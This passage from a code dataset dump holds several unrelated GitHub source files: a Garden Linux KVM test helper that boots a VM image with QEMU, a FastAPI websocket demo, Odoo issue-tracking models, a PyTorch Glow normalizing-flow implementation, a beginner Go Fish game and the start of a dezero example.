This SSHD runs on\n # port tcp/2222\n cmd_kvm_adj.append(\"virt-copy-in -a /tmp/{image_name}.snapshot.img {sshd_systemd_src_file} {systemd_dst_path}\".format(\n image_name=image_name, sshd_systemd_src_file=sshd_systemd_src_file, systemd_dst_path=systemd_dst_path))\n cmd_kvm_adj.append(\"virt-copy-in -a /tmp/{image_name}.snapshot.img {sshd_config_src_file} /etc/ssh/\".format(\n image_name=image_name, sshd_config_src_file=sshd_config_src_file))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chown 0 0 {sshd_config_dst_file}\".format(\n image_name=image_name, sshd_config_dst_file=sshd_config_dst_file))\n cmd_kvm_adj.append(\"guestfish -a /tmp/{image_name}.snapshot.img -i chmod 0644 {sshd_config_dst_file}\".format(\n image_name=image_name, sshd_config_dst_file=sshd_config_dst_file))\n # Create a symlink since Debian watches for type 'link'\n cmd_kvm_adj.append((\"guestfish -a /tmp/{image_name}.snapshot.img -i ln-s \".format(image_name=image_name) +\n \"{systemd_path}sshd-integration.test.service \".format(systemd_path=systemd_dst_path) +\n \"{systemd_path}multi-user.target.wants/sshd-integration.test.service\".format(\n systemd_path=systemd_dst_path)))\n\n for i in cmd_kvm_adj:\n logger.info(\"Running: {cmd}\".format(cmd=i))\n p = subprocess.run([i], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n rc = p.returncode\n if rc == 0:\n logger.info(\"Succeeded: {cmd}\".format(cmd=i))\n else:\n logger.error(\"Failed: {cmd}\".format(cmd=i))\n\n def _start_kvm(self, arch):\n \"\"\" Start VM in KVM for defined arch \"\"\"\n logger.info(\"Starting VM in KVM.\")\n image = self.config[\"image\"]\n image_name = os.path.basename(image)\n port = self.config[\"port\"]\n\n if arch == \"amd64\":\n cmd_kvm = \"qemu-system-x86_64 \\\n -display none \\\n -daemonize \\\n -pidfile /tmp/qemu.pid \\\n -m 1024M \\\n -device virtio-net-pci,netdev=net0,mac=02:9f:ec:22:f8:89 \\\n -netdev user,id=net0,hostfwd=tcp::{port}-:2222,hostname=garden \\\n /tmp/{image_name}.snapshot.img\".format(port=port, image_name=image_name)\n logger.info(cmd_kvm)\n p = subprocess.Popen([cmd_kvm], shell=True)\n logger.info(\"VM starting as amd64 in KVM.\")\n elif arch == \"arm64\":\n cmd_kvm = \"qemu-system-aarch64 \\\n -display none \\\n -daemonize \\\n -cpu cortex-a72 \\\n -machine virt \\\n -bios /usr/share/qemu-efi-aarch64/QEMU_EFI.fd \\\n -pidfile /tmp/qemu.pid \\\n -m 1024M \\\n -device virtio-net-pci,netdev=net0,mac=02:9f:ec:22:f8:89 \\\n -netdev user,id=net0,hostfwd=tcp::{port}-:2222,hostname=garden \\\n /tmp/{image_name}.snapshot.img\".format(port=port, image_name=image_name)\n logger.info(cmd_kvm)\n p = subprocess.Popen([cmd_kvm], shell=True)\n logger.info(\"VM starting as arm64 in KVM.\")\n else:\n logger.error(\"Unsupported architecture.\")\n\n def _stop_kvm(self):\n \"\"\" Stop VM and remove injected file \"\"\"\n logger.info(\"Stopping VM and cleaning up\")\n image = self.config[\"image\"]\n image_name = os.path.basename(image)\n p = subprocess.run(\"pkill qemu\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n rc = p.returncode\n if rc == 0:\n logger.info(\"Succeeded stopping qemu\")\n if os.path.exists(\"/tmp/{image_name}.snapshot.img\".format(image_name=image_name)):\n os.remove(\"/tmp/{image_name}.snapshot.img\".format(image_name=image_name))\n else:\n logger.info(\"/tmp/{image_name}.snapshot.img does not exist\".format(image_name=image_name))\n if os.path.exists(\"/tmp/qemu.pid\"):\n os.remove(\"/tmp/qemu.pid\")\n else:\n logger.error(\"Failed stopping 
qemu\")\n","repo_name":"nkraetzschmar/gardenlinux_test_clone","sub_path":"tests/integration/kvm.py","file_name":"kvm.py","file_ext":"py","file_size_in_byte":12598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73362384803","text":"import json\nimport asyncio\nimport uvicorn\nfrom fastapi import FastAPI\nfrom fastapi import Request\nfrom fastapi import WebSocket\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates\")\n\nclass ToDoRequest(BaseModel):\n task: str\n\nmarks = [\"se\", ]\n# with open('measurements.json', 'r') as file:\n # measurements = iter(json.loads(file.read()))\n@app.post(\"/set\")\ndef set_values(value:ToDoRequest):\n marks.append(value.task)\n return value\n\n\n@app.get(\"/\")\ndef read_root(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\n@app.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket):\n await websocket.accept()\n while True:\n await asyncio.sleep(0.1)\n if len(marks) > 0:\n payload = next(iter(marks))\n print(payload, \"aaaaaa\")\n await websocket.send_json({\"value\":payload})\n marks.remove(payload)\n\ndef main():\n uvicorn.run(\n \"main:app\",\n host=\"0.0.0.0\",\n port=8000,\n log_level=\"debug\",\n reload=True,\n debug=True,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Danny-Dasilva/stream_control","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28544774998","text":"from odoo import models, fields, api\n\n\nclass Issue(models.Model):\n _name = 'issue.issue'\n _description = 'An issue that needs tracked (RMAs etc)'\n _inherit = [\n 'mail.thread',\n 'mail.activity.mixin',\n ]\n\n name = fields.Char()\n description = fields.Html(string='Description')\n user_ids = fields.One2many(\n 'res.users',\n 'id',\n string='Assigned To',\n )\n category_id = fields.Many2one(\n 'issue.category',\n string='Category',\n )\n state = fields.Selection([\n ('needs action', 'Needs Action'),\n ('in progress', 'In Progress'),\n ('completed', 'Completed'),\n ],\n string='Status',\n default='needs action',\n )\n last_checked = fields.Datetime('Last Checked')\n communication_ids = fields.Many2many(\n 'issue.communication',\n 'id',\n string='External Communications',\n )\n old_id = fields.Integer()\n\n\nclass IssueCategory(models.Model):\n _name = 'issue.category'\n _description = 'Different Categories for Issues'\n\n name = fields.Char(compute='_compute_name')\n category = fields.Char(string='Category')\n color_id = fields.Many2one(\n 'issue.category.color',\n string='Color',\n )\n\n @api.depends('color_id', 'category')\n @api.multi\n def _compute_name(self):\n for category in self:\n category.name = f'{category.category} - {category.color_id.name}'\n\n\nclass IssueCategoryColor(models.Model):\n _name = 'issue.category.color'\n _description = 'Color code for Issue Categories'\n\n name = fields.Char(string='Color')\n\n\nclass IssueCommunication(models.Model):\n _name = 'issue.communication'\n _description = 'Different Places Communication about the issue happened'\n\n name = fields.Char(compute='_compute_name')\n channel_id = fields.Many2one(\n 'issue.communication.channel',\n string='Channel',\n oldname='channel',\n )\n identifier = fields.Char(string='Identifier')\n\n @api.depends('channel_id', 
'identifier')\n @api.multi\n def _compute_name(self):\n for communication in self:\n communication.name = f'{communication.channel_id.name}: {communication.identifier}'\n\n\nclass IssueCommunicationChannel(models.Model):\n _name = 'issue.communication.channel'\n _description = 'Platform or Record communication happened'\n\n name = fields.Char()\n","repo_name":"Dcode-Tech/dcode_issue_tracking","sub_path":"models/issue.py","file_name":"issue.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26931011712","text":"\"\"\"Implementation taken from https://github.com/kamenbliznashki/normalizing_flows and modified slightly.\"\"\"\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.distributions as D\nimport torch.nn.functional as F\nfrom torch.utils.checkpoint import checkpoint\n\nfrom fastmri.models.unet import Unet\n\n\nclass Glow(nn.Module):\n \"\"\" Glow multi-scale architecture with depth of flow K and number of levels L; cf Glow figure 2; section 3\"\"\"\n\n def __init__(self, width, depth, n_levels, input_dims=(3, 32, 32), affine_scale_low=0., unet_coupling=False, try_to_center=False, checkpoint_grads=False):\n super().__init__()\n # calculate output dims\n in_channels, H, W = input_dims\n out_channels = int(in_channels * 4**(n_levels+1) / 2**n_levels) # each Squeeze results in 4x in_channels (cf RealNVP section 3.6); each Split in 1/2 x in_channels\n out_HW = int(H / 2**(n_levels+1)) # each Squeeze is 1/2 x HW dim (cf RealNVP section 3.6)\n self.output_dims = out_channels, out_HW, out_HW\n\n # preprocess images\n self.preprocess = Preprocess(try_to_center)\n\n # network layers cf Glow figure 2b: (Squeeze -> FlowStep x depth -> Split) x n_levels -> Squeeze -> FlowStep x depth\n self.flowlevels = nn.ModuleList([FlowLevel(in_channels * 2**i, width, depth, affine_scale_low, unet_coupling, checkpoint_grads) for i in range(n_levels)])\n self.squeeze = Squeeze()\n self.flowstep = FlowSequential(*[FlowStep(out_channels, width, affine_scale_low, unet_coupling) for _ in range(depth)], checkpoint_grads=checkpoint_grads)\n\n # gaussianize the final z output; initialize to identity\n self.gaussianize = Gaussianize(out_channels)\n\n # base distribution of the flow\n self.register_buffer('base_dist_mean', torch.zeros(1))\n self.register_buffer('base_dist_var', torch.ones(1))\n\n def forward(self, x):\n x, sum_logdets = self.preprocess(x)\n # pass through flow\n zs = []\n for m in self.flowlevels:\n x, z, logdet = m(x)\n sum_logdets = sum_logdets + logdet\n zs.append(z)\n x = self.squeeze(x)\n z, logdet = self.flowstep(x)\n sum_logdets = sum_logdets + logdet\n\n # gaussianize the final z\n z, logdet = self.gaussianize(torch.zeros_like(z), z)\n sum_logdets = sum_logdets + logdet\n zs.append(z)\n return zs, sum_logdets\n\n def inverse(self, zs=None, batch_size=None, z_std=1.):\n if zs is None: # if no random numbers are passed, generate new from the base distribution\n assert batch_size is not None, 'Must either specify batch_size or pass a batch of z random numbers.'\n zs = [z_std * self.base_dist.sample((batch_size, *self.output_dims)).squeeze()]\n # pass through inverse flow\n z, sum_logdets = self.gaussianize.inverse(torch.zeros_like(zs[-1]), zs[-1])\n x, logdet = self.flowstep.inverse(z)\n sum_logdets = sum_logdets + logdet\n x = self.squeeze.inverse(x)\n for i, m in enumerate(reversed(self.flowlevels)): # type: ignore\n z = z_std * (self.base_dist.sample(x.shape).squeeze() if len(zs) 
== 1 else zs[-i-2]) # if no z's are passed, generate new random numbers from the base dist\n x, logdet = m.inverse(x, z)\n sum_logdets = sum_logdets + logdet\n # postprocess\n x, logdet = self.preprocess.inverse(x)\n sum_logdets = sum_logdets + logdet\n return x, sum_logdets\n\n @property\n def base_dist(self):\n return D.Normal(self.base_dist_mean, self.base_dist_var)\n\n def log_prob(self, x, bits_per_pixel=False):\n zs, logdet = self.forward(x)\n return self.log_prob_latent(zs, logdet, bits_per_pixel)\n\n def log_prob_latent(self, zs, logdet, bits_per_pixel=False):\n log_prob = sum(self.base_dist.log_prob(z).sum([1, 2, 3]) for z in zs) + logdet\n if bits_per_pixel:\n num_pixels = sum(z[0].numel() for z in zs)\n log_prob /= (math.log(2) * num_pixels)\n return log_prob\n\n\nclass FlowLevel(nn.Module):\n \"\"\" One depth level of Glow flow (Squeeze -> FlowStep x K -> Split); cf Glow figure 2b \"\"\"\n\n def __init__(self, n_channels, width, depth, affine_scale_low, unet_coupling, checkpoint_grads=False):\n super().__init__()\n # network layers\n self.squeeze = Squeeze()\n self.flowsteps = FlowSequential(*[FlowStep(4*n_channels, width, affine_scale_low, unet_coupling) for _ in range(depth)], checkpoint_grads=checkpoint_grads)\n self.split = Split(4*n_channels)\n\n def forward(self, x):\n x = self.squeeze(x)\n x, logdet_flowsteps = self.flowsteps(x)\n x1, z2, logdet_split = self.split(x)\n logdet = logdet_flowsteps + logdet_split\n return x1, z2, logdet\n\n def inverse(self, x1, z2):\n x, logdet_split = self.split.inverse(x1, z2)\n x, logdet_flowsteps = self.flowsteps.inverse(x)\n x = self.squeeze.inverse(x)\n logdet = logdet_flowsteps + logdet_split\n return x, logdet\n\n\nclass FlowSequential(nn.Sequential):\n \"\"\" Container for layers of a normalizing flow \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.checkpoint_grads = kwargs.pop('checkpoint_grads', None)\n super().__init__(*args, **kwargs)\n\n def forward(self, x):\n sum_logdets = 0.\n for module in self:\n x, logdet = module(x) if not self.checkpoint_grads else checkpoint(module, x)\n sum_logdets = sum_logdets + logdet\n return x, sum_logdets\n\n def inverse(self, z):\n sum_logdets = 0.\n for module in reversed(self): # type: ignore\n z, logdet = module.inverse(z)\n sum_logdets = sum_logdets + logdet\n return z, sum_logdets\n\n\nclass FlowStep(FlowSequential):\n \"\"\" One step of Glow flow (Actnorm -> Invertible 1x1 conv -> Affine coupling); cf Glow Figure 2a \"\"\"\n\n def __init__(self, n_channels, width, affine_scale_low, unet_coupling):\n super().__init__(Actnorm(param_dim=(1, n_channels, 1, 1)),\n Invertible1x1Conv(n_channels),\n AffineCoupling(n_channels, width, affine_scale_low, unet_coupling))\n\n\nclass Actnorm(nn.Module):\n \"\"\" Actnorm layer; cf Glow section 3.1 \"\"\"\n\n def __init__(self, param_dim=(1, 3, 1, 1)):\n super().__init__()\n self.scale = nn.Parameter(torch.ones(param_dim))\n self.bias = nn.Parameter(torch.zeros(param_dim))\n self.register_buffer('initialized', torch.tensor(0).byte())\n\n def forward(self, x):\n if not self.initialized:\n # per channel mean and variance where x.shape = (B, C, H, W)\n self.bias.squeeze().data.copy_(x.transpose(0, 1).flatten(1).mean(1)).view_as(self.scale)\n self.scale.squeeze().data.copy_(x.transpose(0, 1).flatten(1).std(1, False) + 1e-6).view_as(self.bias)\n self.initialized += 1\n\n z = (x - self.bias) / self.scale\n logdet = - self.scale.abs().log().sum() * x.shape[2] * x.shape[3]\n return z, logdet\n\n def inverse(self, z):\n return z * self.scale + self.bias, 
self.scale.abs().log().sum() * z.shape[2] * z.shape[3]\n\n\nclass Invertible1x1Conv(nn.Module):\n \"\"\" Invertible 1x1 convolution layer; cf Glow section 3.2 \"\"\"\n\n def __init__(self, n_channels=3):\n super().__init__()\n\n # initialize a 1x1 convolution weight matrix\n w = torch.randn(n_channels, n_channels)\n w = torch.qr(w)[0] # note: nn.init.orthogonal_ returns orth matrices with dets +/- 1 which complicates the inverse call below\n self.w = nn.Parameter(w)\n\n def forward(self, x):\n B, C, H, W = x.shape\n logdet = torch.slogdet(self.w.unsqueeze(0))[-1].squeeze(0) * H * W # add and remove batch dim to avoid slogdet performance bug\n return F.conv2d(x, self.w.view(C, C, 1, 1)), logdet\n\n def inverse(self, z):\n B, C, H, W = z.shape\n w_inv = self.w.inverse()\n logdet = - torch.slogdet(self.w.unsqueeze(0))[-1].squeeze(0) * H * W\n return F.conv2d(z, w_inv.view(C, C, 1, 1)), logdet\n\n\nclass AffineCoupling(nn.Module):\n \"\"\" Affine coupling layer; cf Glow section 3.3; RealNVP figure 2 \"\"\"\n\n def __init__(self, n_channels, width, affine_scale_low, unet_coupling):\n super().__init__()\n\n self.affine_scale_low = affine_scale_low\n\n # network layers;\n # per realnvp, network splits input, operates on half of it, and returns shift and scale of dim = half the input channels\n if unet_coupling:\n self.unet = Unet(in_chans=n_channels//2, out_chans=n_channels, num_pool_layers=2)\n self.conv3 = nn.Conv2d(n_channels, n_channels, kernel_size=1)\n else:\n self.unet = None\n self.conv1 = nn.Conv2d(n_channels//2, width, kernel_size=3, padding=1, bias=False) # input is split along channel dim\n self.actnorm1 = Actnorm(param_dim=(1, width, 1, 1))\n self.conv2 = nn.Conv2d(width, width, kernel_size=1, padding=1, bias=False)\n self.actnorm2 = Actnorm(param_dim=(1, width, 1, 1))\n self.conv3 = nn.Conv2d(width, n_channels, kernel_size=3) # output is split into scale and shift components\n self.log_scale_factor = nn.Parameter(torch.zeros(n_channels, 1, 1)) # learned scale (cf RealNVP sec 4.1 / Glow official code\n\n # initialize last convolution with zeros, such that each affine coupling layer performs an identity function\n self.conv3.weight.data.zero_()\n self.conv3.bias.data.zero_()\n\n def forward(self, x):\n x_a, x_b = x.chunk(2, 1) # split along channel dim\n s, t = self.NN(x_b)\n z_a = s * x_a + t\n z_b = x_b\n z = torch.cat([z_a, z_b], dim=1) # concat along channel dim\n\n logdet = s.log().sum([1, 2, 3])\n return z, logdet\n\n def inverse(self, z):\n z_a, z_b = z.chunk(2, 1) # split along channel dim\n s, t = self.NN(z_b)\n x_a = (z_a - t) / s\n x_b = z_b\n x = torch.cat([x_a, x_b], dim=1) # concat along channel dim\n\n logdet = - s.log().sum([1, 2, 3])\n return x, logdet\n\n def NN(self, chunk_b):\n if self.unet:\n h = self.unet(chunk_b)\n else:\n h = F.relu(self.actnorm1(self.conv1(chunk_b))[0])\n h = F.relu(self.actnorm2(self.conv2(h))[0])\n\n h = self.conv3(h) * self.log_scale_factor.exp()\n t = h[:,0::2,:,:] # shift; take even channels\n s = h[:,1::2,:,:] # scale; take odd channels\n s = self.affine_scale_low + (1 - self.affine_scale_low) * torch.sigmoid(s + 2.) # at initialization, s is 0 and sigmoid(2) is near identity\n return s, t\n\n\nclass Squeeze(nn.Module):\n \"\"\" RealNVP squeezing operation layer (cf RealNVP section 3.6; Glow figure 2b):\n For each channel, it divides the image into subsquares of shape 2 × 2 × c, then reshapes them into subsquares of\n shape 1 × 1 × 4c. 
The squeezing operation transforms an s × s × c tensor into an s/2 × s/2 × 4c tensor \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def forward(self, x):\n B, C, H, W = x.shape\n x = x.reshape(B, C, H//2, 2, W//2, 2) # factor spatial dim\n x = x.permute(0, 1, 3, 5, 2, 4) # transpose to (B, C, 2, 2, H//2, W//2)\n x = x.reshape(B, 4*C, H//2, W//2) # aggregate spatial dim factors into channels\n return x\n\n def inverse(self, x):\n B, C, H, W = x.shape\n x = x.reshape(B, C//4, 2, 2, H, W) # factor channel dim\n x = x.permute(0, 1, 4, 2, 5, 3) # transpose to (B, C//4, H, 2, W, 2)\n x = x.reshape(B, C//4, 2*H, 2*W) # aggregate channel dim factors into spatial dims\n return x\n\n\nclass Split(nn.Module):\n \"\"\" Split layer; cf Glow figure 2 / RealNVP figure 4b\n Based on RealNVP multi-scale architecture: splits an input in half along the channel dim; half the vars are\n directly modeled as Gaussians while the other half undergo further transformations (cf RealNVP figure 4b).\n \"\"\"\n\n def __init__(self, n_channels):\n super().__init__()\n self.gaussianize = Gaussianize(n_channels//2)\n\n def forward(self, x):\n x1, x2 = x.chunk(2, dim=1) # split input along channel dim\n z2, logdet = self.gaussianize(x1, x2)\n return x1, z2, logdet\n\n def inverse(self, x1, z2):\n x2, logdet = self.gaussianize.inverse(x1, z2)\n x = torch.cat([x1, x2], dim=1) # cat along channel dim\n return x, logdet\n\n\nclass Gaussianize(nn.Module):\n \"\"\" Gaussianization per RealNVP sec 3.6 / fig 4b -- at each step half the variables are directly modeled as Gaussians.\n Model as Gaussians:\n x2 = z2 * exp(logs) + mu, so x2 ~ N(mu, exp(logs)^2) where mu, logs = f(x1)\n then to recover the random numbers z driving the model:\n z2 = (x2 - mu) * exp(-logs)\n Here f(x1) is a conv layer initialized to identity.\n \"\"\"\n\n def __init__(self, n_channels):\n super().__init__()\n self.net = nn.Conv2d(n_channels, 2*n_channels, kernel_size=3, padding=1) # computes the parameters of Gaussian\n self.log_scale_factor = nn.Parameter(torch.zeros(2*n_channels, 1, 1)) # learned scale (cf RealNVP sec 4.1 / Glow official code\n # initialize to identity\n self.net.weight.data.zero_()\n self.net.bias.data.zero_()\n\n def forward(self, x1, x2):\n h = self.net(x1) * self.log_scale_factor.exp() # use x1 to model x2 as Gaussians; learnable scale\n m, logs = h[:,0::2,:,:], h[:,1::2,:,:] # split along channel dims\n z2 = (x2 - m) * torch.exp(-logs) # center and scale; log prob is computed at the model forward\n logdet = - logs.sum([1, 2, 3])\n return z2, logdet\n\n def inverse(self, x1, z2):\n h = self.net(x1) * self.log_scale_factor.exp()\n m, logs = h[:,0::2,:,:], h[:,1::2,:,:]\n x2 = m + z2 * torch.exp(logs)\n logdet = logs.sum([1, 2, 3])\n return x2, logdet\n\n\nclass Preprocess(nn.Module):\n def __init__(self, try_to_center):\n super().__init__()\n self.try_to_center = try_to_center\n\n def forward(self, x):\n logdet = - math.log(256) * x[0].numel() # processing each image dim from [0, 255] to [0,1]; per RealNVP sec 4.1 taken into account\n if self.try_to_center:\n x = x - 0.5\n return x, logdet\n\n def inverse(self, x):\n logdet = math.log(256) * x[0].numel()\n if self.try_to_center:\n x = x + 0.5\n return x, logdet\n","repo_name":"ffraaz/flow_based_priors","sub_path":"kernprior/glow.py","file_name":"glow.py","file_ext":"py","file_size_in_byte":14622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32192694690","text":"import random\n\ndeck=[\"Ace of Spades\",\"2 of 
Spades\",\"3 of Spades\",\"4 of Spades\",\"5 of Spades\",\"6 of Spades\",\"7 of Spades\",\"8 of Spades\",\"9 of Spades\",\"10 of Spades\",\"Jack of Spades\",\"Queen of Spades\",\"King of Spades\",\"Ace of Diamonds\",\"2 of Diamonds\",\"3 of Diamonds\",\"4 of Diamonds\",\"5 of Diamonds\",\"6 of Diamonds\",\"7 of Diamonds\",\"8 of Diamonds\",\"9 of Diamonds\",\"10 of Diamonds\",\"Jack of Diamonds\",\"Queen of Diamonds\",\"King of Diamonds\", \"Ace of Clubs\",\"2 of Clubs\",\"3 of Clubs\",\"4 of Clubs\",\"5 of Clubs\",\"6 of Clubs\",\"7 of Clubs\",\"8 of Clubs\",\"9 of Clubs\",\"10 of Clubs\",\"Jack of Clubs\",\"Queen of Clubs\",\"King of Clubs\",\"Ace of Hearts\",\"2 of Hearts\",\"3 of Hearts\",\"4 of Hearts\",\"5 of Hearts\",\"6 of Hearts\",\"7 of Hearts\",\"8 of Hearts\",\"9 of Hearts\",\"10 of Hearts\",\"Jack of Hearts\",\"Queen of Hearts\",\"King of Hearts\"]\nrandom.shuffle(deck)\n\nwinner=1\nplayer = 1\np1hand = []\np2hand = []\np1wins= 0\np2wins= 0 \n\n\ndef give_hand():\n for num in range (0,7):\n p1hand.append(deck[num])\n for num in range (7,14):\n p2hand.append(deck[num])\n for elem in range (0,15):\n deck.pop(0)\n elem=elem+1\n print(\"Player 1 please write down your hand: \" + str(p1hand))\n ready=input(\"Ready to see your hand Player 2? \")\n if ready==\"yes\":\n print(\"Player 2 please write down your hand: \" + str(p2hand))\n\ndef go_fish():\n go_fish = 0\n if player==1:\n if (card + \" of Spades\") in p2hand:\n print(\"Player 1 has taken the card \" + card + \" of Spades\")\n p1hand.append(card + \" of Spades\")\n p2hand.remove(card + \" of Spades\")\n go_fish=go_fish + 1\n if (card + \" of Hearts\") in p2hand:\n print(\"Player 1 has taken the card \" + card + \" of Hearts\")\n p1hand.append(card + \" of Hearts\")\n p2hand.remove(card + \" of Hearts\")\n go_fish=go_fish + 1\n if (card + \" of Clubs\") in p2hand:\n print(\"Player 1 has taken the card \" + card + \" of Clubs\")\n p1hand.append(card + \" of Clubs\")\n p2hand.remove(card + \" of Clubs\")\n go_fish=go_fish + 1\n if (card + \" of Diamonds\") in p2hand:\n print(\"Player 1 has taken the card \" + card + \" of Diamonds\")\n p1hand.append(card + \" of Diamonds\")\n p2hand.remove(card + \" of Diamonds\")\n go_fish=go_fish + 1\n if go_fish==0:\n print(\"Go Fish!\")\n draw_card()\n\n if player==2:\n if (card + \" of Spades\") in p1hand:\n print(\"Player 2 has taken the card \" + card + \" of Spades\")\n p2hand.append(card + \" of Spades\")\n p1hand.remove(card + \" of Spades\")\n go_fish=go_fish + 1\n if (card + \" of Hearts\") in p1hand:\n print(\"Player 2 has taken the card \" + card + \" of Hearts\")\n p2hand.append(card + \" of Hearts\")\n p1hand.remove(card + \" of Hearts\")\n go_fish=go_fish + 1\n if (card + \" of Clubs\") in p1hand:\n print(\"Player 2 has taken the card \" + card + \" of Clubs\")\n p2hand.append(card + \" of Clubs\")\n p1hand.remove(card + \" of Clubs\")\n go_fish=go_fish + 1\n if (card + \" of Diamonds\") in p1hand:\n print(\"Player 2 has taken the card \" + card + \" of Diamonds\")\n p2hand.append(card + \" of Diamonds\")\n p1hand.remove(card + \" of Diamonds\")\n go_fish=go_fish + 1\n if go_fish==0:\n print(\"Go Fish!\")\n draw_card()\n \ndef draw_card():\n if player==1:\n p1hand.append(deck[0])\n deck.pop(0)\n print(\"New Hand: \" + str(p1hand))\n if player==2:\n p2hand.append(deck[0])\n deck.pop(0)\n print(\"New Hand \" + str(p2hand))\n\ndef draw_set():\n if player==1:\n for num in range (0,3):\n p1hand.append(deck[num])\n for elem in range (0,5):\n deck.pop(0)\n elem = elem +1\n print(\"New 
Hand:\" + str(p1hand))\n if player==2:\n for num in range (0,3):\n p1hand.append(deck[num])\n for elem in range (0,3):\n deck.pop(0)\n elem = elem +1\n print(\"New Hand: \" + str(p2hand))\n\ndef check_sets():\n if player==1:\n global p1wins\n for num in range (11):\n if (str(num) + \" of Spades\" in p1hand) and (str(num) + \" of Hearts\" in p1hand) and (str(num) + \" of Diamonds\" in p1hand) and (str(num) + \" of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(str(num) + \" of Spades\")\n p1hand.remove(str(num) + \" of Hearts\")\n p1hand.remove(str(num) + \" of Diamonds\")\n p1hand.remove(str(num) + \" of Clubs\")\n draw_set()\n if (\"Ace of Spades\" in p1hand) and (\"Ace of Hearts\" in p1hand) and (\"Ace of Diamonds\" in p1hand) and (\"Ace of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(\"Ace of Spades\")\n p1hand.remove(\"Ace of Hearts\")\n p1hand.remove(\"Ace of Diamonds\")\n p1hand.remove(\"Ace of Clubs\")\n draw_set()\n if (\"Jack of Spades\" in p1hand) and (\"Jack of Hearts\" in p1hand) and (\"Jack of Diamonds\" in p1hand) and (\"Jack of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(\"Jack of Spades\")\n p1hand.remove(\"Jack of Hearts\")\n p1hand.remove(\"Jack of Diamonds\")\n p1hand.remove(\"Jack of Clubs\")\n draw_set()\n if (\"Queen of Spades\" in p1hand) and (\"Queen of Hearts\" in p1hand) and (\"Queen of Diamonds\" in p1hand) and (\"Queen of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(\"Queen of Spades\")\n p1hand.remove(\"Queen of Hearts\")\n p1hand.remove(\"Queen of Diamonds\")\n p1hand.remove(\"Queen of Clubs\")\n draw_set()\n if (\"King of Spades\" in p1hand) and (\"King of Hearts\" in p1hand) and (\"King of Diamonds\" in p1hand) and (\"King of Clubs\" in p1hand):\n p1wins = p1wins + 1\n p1hand.remove(\"King of Spades\")\n p1hand.remove(\"King of Hearts\")\n p1hand.remove(\"King of Diamonds\")\n p1hand.remove(\"King of Clubs\")\n draw_set()\n if player==2:\n global p2wins\n for num in range (11):\n if (str(num) + \" of Spades\" in p2hand) and (str(num) + \" of Hearts\" in p2hand) and (str(num) + \" of Diamonds\" in p2hand) and (str(num) + \" of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(str(num) + \" of Spades\")\n p2hand.remove(str(num) + \" of Hearts\")\n p2hand.remove(str(num) + \" of Diamonds\")\n p2hand.remove(str(num) + \" of Clubs\")\n draw_set()\n if (\"Ace of Spades\" in p2hand) and (\"Ace of Hearts\" in p2hand) and (\"Ace of Diamonds\" in p2hand) and (\"Ace of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(\"Ace of Spades\")\n p2hand.remove(\"Ace of Hearts\")\n p2hand.remove(\"Ace of Diamonds\")\n p2hand.remove(\"Ace of Clubs\")\n draw_set()\n if (\"Jack of Spades\" in p2hand) and (\"Jack of Hearts\" in p2hand) and (\"Jack of Diamonds\" in p2hand) and (\"Jack of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(\"Jack of Spades\")\n p2hand.remove(\"Jack of Hearts\")\n p2hand.remove(\"Jack of Diamonds\")\n p2hand.remove(\"Jack of Clubs\")\n draw_set()\n if (\"Queen of Spades\" in p2hand) and (\"Queen of Hearts\" in p2hand) and (\"Queen of Diamonds\" in p2hand) and (\"Queen of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(\"Queen of Spades\")\n p2hand.remove(\"Queen of Hearts\")\n p2hand.remove(\"Queen of Diamonds\")\n p2hand.remove(\"Queen of Clubs\")\n draw_set()\n if (\"King of Spades\" in p2hand) and (\"King of Hearts\" in p2hand) and (\"King of Diamonds\" in p2hand) and (\"King of Clubs\" in p2hand):\n p2wins = p2wins + 1\n p2hand.remove(\"King of Spades\")\n 
p2hand.remove(\"King of Hearts\")\n p2hand.remove(\"King of Diamonds\")\n p2hand.remove(\"King of Clubs\")\n draw_set()\n\ndef check_winner():\n if p1wins > 5:\n return \"1\"\n if p2wins > 5:\n return \"2\"\n\nplay = input(\"Would you like to play Go Fish? \")\nif (play == \"yes\"):\n give_hand()\nwhile check_winner() is None:\n card=input(\"Player \" + str(player) + \" what card would you like to fish for? \")\n go_fish()\n check_sets()\n check_winner()\n if player==1:\n player=2\n else:\n player=1\nprint(\"Player \" + check_winner() + \" wins!\")\n \n \n","repo_name":"sfrancis21/Go-Fish-2020","sub_path":"GoFish.py","file_name":"GoFish.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74072234402","text":"import numpy as np\nif '__file__' in globals():\n import os\n import sys\n sys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nfrom dezero import Variable\nfrom dezero.utils import plot_dot_graph\nimport dezero.functions as F\n\n# toy dataset\nnp.random.seed(0)\nx = np.random.rand(100, 1)\ny = np.sin(2 * np.pi * x) + np.random.rand(100, 1)\n\n# 